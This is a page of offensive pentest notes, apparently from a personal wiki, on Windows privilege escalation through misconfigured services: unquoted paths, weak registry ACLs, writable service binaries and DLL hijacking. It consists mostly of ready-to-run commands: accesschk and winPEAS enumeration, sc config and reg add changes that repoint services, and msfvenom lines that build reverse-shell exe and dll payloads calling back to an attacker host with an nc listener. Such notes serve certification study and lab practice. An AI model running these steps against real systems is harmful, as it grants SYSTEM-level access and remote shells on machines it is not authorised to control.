Service Exploits

NB: You have to be able to start/stop a service to exploit

.\accesscheck /accepteula -uvqc $SERVICE

Insecure Service Properties

Find the vulnerable service

.\winPEASany.exe quiet servicesinfo

Confirm access to the service

.\accesschck.exe /accepteula -uqvwc $USER $SERVICE

Check configuration

sc qc $SERVICE

Check service state

sc query $SERVICE

Payload

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o rev.exe

Set service path to location of shell on victim

sc config $SERVICE binpath= "\"C:\Users\$User\Desktop\rev.exe""

Start nc listener
Restart the service

Unquoted Service Paths

Useful when ability to write to the directory is present but can't overwrite files in the main directory
Abuses the way Windows looks for executable, for example
- C:\Program Files\Service\Cool Service\svc.exe
  - C:\Program.exe
  - C:\Program Files\Service.exe
  - C:\Program FIles\Service\Cool.exe
Create an executable named appropriately and place in appropriate directory
Find vulnerability

.\winPEASany.exe quiet servicesinfo

Or use wmic

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

You need
- Path to .exe that does not contain quotes
- Write permissions to any prior folder in the tree
Confirm service access for your user

.\accesscheck /accepteula -uvqc $USER $SERVICE

Check write permission to existing binary paths

.\accesschck.exe /accepteula -uwdq "C:\" 
.\accesschck.exe /accepteula -uwdq "C:\Program Files\" 
.\accesschck.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

If you have a writeable directory, name the reverse shell payload the $FolderName.exe
Put it in the directory
Start nc listener
Restart the service

Weak Registry Permissions

If ACL on a registry object is misconfigured, we could modify it even if we can't from the system normally
winpeas will find all of these
Verify

Get-ACL HKLM:\System\CurrentControlSet\Service\regsvc | Format-List

.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Check if you have permission to start and stop the service

.\accesschk.exe /accepteula -ucqv $USER regsvc

Check the registry values for services

reg query HKLM\System\CurrentControlSet\Services\regsvc

With permissions this can be overwritten and made to point to rev.exe payload

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\path\to\revshell.exe /f

Start nc listener
Restart the service

Insecure Service Executables

If the .exe itself can be modified, can just replace it with our own msfvenom payload, renamed

.\winPEASany.exe quiet servicesinfo

Validate access

.\accesschk.exe /accepteula -uwq "C:\Program Files\File Permissions Service\$service.exe"

Confirm access to start/stop

.\accesschk.exe /accepteula -ucqv $user $service

Backup or rename original .exe

move "C:\Program Files\File Permissions Service\$service.exe" servce.exe.bak

Overwrite or replace the backed-up .exe

copy /Y C:\path\to\rev.exe "C:\Program Files\File Permissions Service\$service.exe"

Start nc listener
Restart the service

DLL Hijacking

Some programs require libraries loaded (DLLS)
If it contains an absolute path, or if the DLL is missing, and we have write access to the directory, we can essentially do the same as replacing the .exe itself to exploit
winpeas usually finds these
Check access to start/stop

.\accesschk.exe /accepteula -ucqv $user $dllsvc

Check the service

sc qc dllsvc

To be very sure, you can copy the service to a VM and check it with procmon to ensure the PATH, however, running the .exe from the location where the dll is located is usually enough. If you have GUI access it's easier to sus this out locally
Create a dll reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f dll -o reverse.dll

Copy into the folder with the path
Stop and start the service

net stop $dllsvc net start $dllsvc

PreviousPrivilege Exploits NextPassword Hunting

Last updated 3 years ago